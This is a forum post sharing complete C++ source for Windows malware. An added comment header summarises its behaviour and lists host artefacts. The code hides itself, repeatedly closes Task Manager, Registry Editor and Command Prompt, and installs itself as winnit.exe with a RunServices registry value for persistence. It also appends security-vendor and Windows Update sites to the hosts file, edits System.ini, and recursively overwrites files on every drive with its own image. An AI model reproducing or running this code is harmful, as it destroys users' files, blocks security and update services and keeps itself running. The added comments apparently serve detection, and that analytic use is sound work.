I know writing malware is overrated, but I am dumping my whole C++ source folder, and this is included. I do not condone the use of this on your computer or anyone else's.
Code:
// Analyst summary (taken from the listing below, not from a run):
//   - hides its own console, then loops forever closing admin tools by window
//     title, toggling the taskbar, moving the cursor and inverting the screen
//   - Startup(): copies the running image to <system dir>\winnit.exe and sets a
//     "Windows User Init" value under an HKLM ...\RunServices key
//   - Restrict(): appends host names to the hosts file and a device= line to
//     System.ini
//   - Spread()/FindSub(): walks drive roots C: through Z: calling CopyFile with
//     overwrite enabled
// Host artefacts worth hunting for: the file name winnit.exe, the registry
// value name "Windows User Init", unexpected writes to the hosts file and to
// System.ini, and one process issuing CopyFile across many directories.
#include <windows.h>
#include <string>
#include <iostream>
#include <vector>
#include "wininet.h"   // no WinINet call appears in this listing
// Not the macro windows.h tests for (WIN32_LEAN_AND_MEAN), and it is defined
// after the include, so it changes nothing.
#define WIN_32_LEAN_AND_MEAN
void Restrict();
void Startup();
void InvertScreen();
void Spread();
void FindSub();
// Shared buffer that receives this executable's own path (filled in FindSub and Startup).
char path[MAX_PATH];
using namespace std;

// Entry point: hides the console window, then runs the nuisance/payload loop
// below without ever returning.
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    HWND hWin;
    srand(GetTickCount());
    // Both values fall in 1..RAND_MAX.
    int a = rand() % RAND_MAX + 1;
    int b = rand() % RAND_MAX + 1;
    int x = GetSystemMetrics(SM_CXSCREEN);
    int y = GetSystemMetrics(SM_CYSCREEN);
    // Allocate a console and immediately hide it (0 == SW_HIDE).
    AllocConsole();
    hWin=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(hWin,0);
    while(1)
    {
        // `=` is an assignment: a takes b's value, which is at least 1, so
        // this branch runs on every pass of the loop.
        if(a = b)
        {
            // WM_CLOSE is sent to whatever window carries each of these exact
            // titles; FindWindow's result is not checked before use.
            hWin = FindWindow(NULL,"Windows Task Manager");
            SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
            hWin = FindWindow(NULL,"Registry Editor");
            SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
            hWin = FindWindow(NULL,"Command Prompt");
            SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
            hWin = FindWindow(NULL,"Close Program");
            SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
            // Shell_TrayWnd is the taskbar window class: hide it for one
            // second, then show it for one second.
            hWin = FindWindow("Shell_TrayWnd",NULL);
            ShowWindow(hWin,false);
            Sleep(1000);
            ShowWindow(hWin,true);
            Sleep(1000);
            SetCursorPos(rand()%x, rand()%y);
            InvertScreen();
        }
        // The persistence, hosts/System.ini and file-copy routines are all
        // called from inside the loop, so they repeat on every pass in which
        // the condition holds.
        if(a*b > RAND_MAX)
        {
            Startup();
            Restrict();
            Spread();
        }
        else
        {
            // Both strings read as ROT13 text; the caption decodes to "Rot 13".
            MessageBox(NULL,"E.V.C Sevgm","Ebg 13",MB_OK);
        }
    }
}

// Recursive directory walk starting at `sub` (a path ending in a backslash).
// For every entry that is not a plain directory it calls CopyFile with the
// running image as the source.
void FindSub(string sub)
{
    GetModuleFileName(GetModuleHandle(NULL), path, MAX_PATH);
    WIN32_FIND_DATA fdSub;
    string dir=sub+"*.*";
    HANDLE hSpread = FindFirstFile(dir.c_str(), &fdSub);
    if (hSpread!=INVALID_HANDLE_VALUE)
    {
        int dirs=0;
        vector<string> dirnames;
        do{
            // Exact equality: only entries whose attribute word is exactly
            // FILE_ATTRIBUTE_DIRECTORY are treated as directories.
            if (fdSub.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY)
            {
                if (strcmp(fdSub.cFileName, ".") && strcmp(fdSub.cFileName, ".."))
                {
                    dirnames.push_back(fdSub.cFileName);
                    dirs++;
                }
            }
            else
            {
                string Spread=sub;
                Spread+=fdSub.cFileName;
                Spread+=".exe";
                // bFailIfExists is FALSE, so an existing file at the
                // destination is overwritten: this is destructive. The return
                // value is ignored.
                CopyFile(path, fdSub.cFileName, FALSE);
            }
        } while(FindNextFile(hSpread, &fdSub)!=0);
        FindClose(hSpread);
        // Descend into the sub-directories collected above.
        for (int i=0; i<dirs; i++)
        {
            string curdir=sub+dirnames[i]+"\\";
            FindSub(curdir);
        }
    }
}

// Calls FindSub on the root of every drive letter from C: to Z:.
void Spread()
{
    char dir[4]="C:\\";
    for (char n='C'; n<='Z'; n++)
    {
        dir[0]=n;
        FindSub(dir);
    }
}

// Inverts the colours of the whole screen through the screen DC, waits half a
// second, then releases the DC.
void InvertScreen()
{
    HDC hdc = GetWindowDC(NULL);
    PatBlt(hdc, 0, 0, GetDeviceCaps(hdc, HORZRES), GetDeviceCaps(hdc, VERTRES), DSTINVERT);
    Sleep(500);
    ReleaseDC(NULL, hdc);
}

// Appends entries to the hosts file and a device= line to System.ini. Both
// files are opened in append mode with hard-coded paths, and neither fopen
// result is checked. The host names cover security-vendor, update and search
// sites, so this is presumably meant to interfere with name resolution for
// them. File-integrity monitoring on these two files catches this change.
void Restrict()
{
    FILE *file;
    unsigned char PathToFile[20] = "winnit.exe";
    file = fopen("C:\\Windows\\System32\\Drivers\\Etc\\Hosts","a");
    fputs (" macafee.com\n",file);
    fputs (" www.macafee.com\n",file);
    fputs (" norton.com\n",file);
    fputs (" www.windowsupdate.microsoft.com\n",file);
    fputs (" www.yahoo.com\n",file);
    fputs (" yahoo.com\n",file);
    fputs (" google.com\n",file);
    fclose(file);
    file = fopen("C:\\windows\\System.ini","a");
    // Writes the text "device=winnit.exe".
    fprintf(file,"device=%s",PathToFile);
    fclose(file);
}

// Persistence: copies the running image into the system directory as
// winnit.exe and writes a "Windows User Init" value under an HKLM RunServices
// key. No return code is checked anywhere in this function.
void Startup()
{
    HMODULE GetModH = GetModuleHandle(0);
    GetModuleFileName(GetModH, path, 256);
    HKEY hKey;
    char sd[255];
    GetSystemDirectory(sd,255);
    strcat(sd,"\\winnit.exe");
    CopyFile(path,sd,FALSE);
    unsigned char PathToFile[20] = "winnit.exe";
    // hKey is used below whether or not the open succeeded.
    RegOpenKeyEx( HKEY_LOCAL_MACHINE,"\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE,&hKey );
    // The data is the whole 20-byte buffer, so it includes the padding after
    // the string.
    RegSetValueEx(hKey,"Windows User Init",0,REG_SZ,PathToFile,sizeof(PathToFile));
    RegCloseKey(hKey);
}
Thread: [C++]Malware
- 01 Jul. 2010 05:00pm #1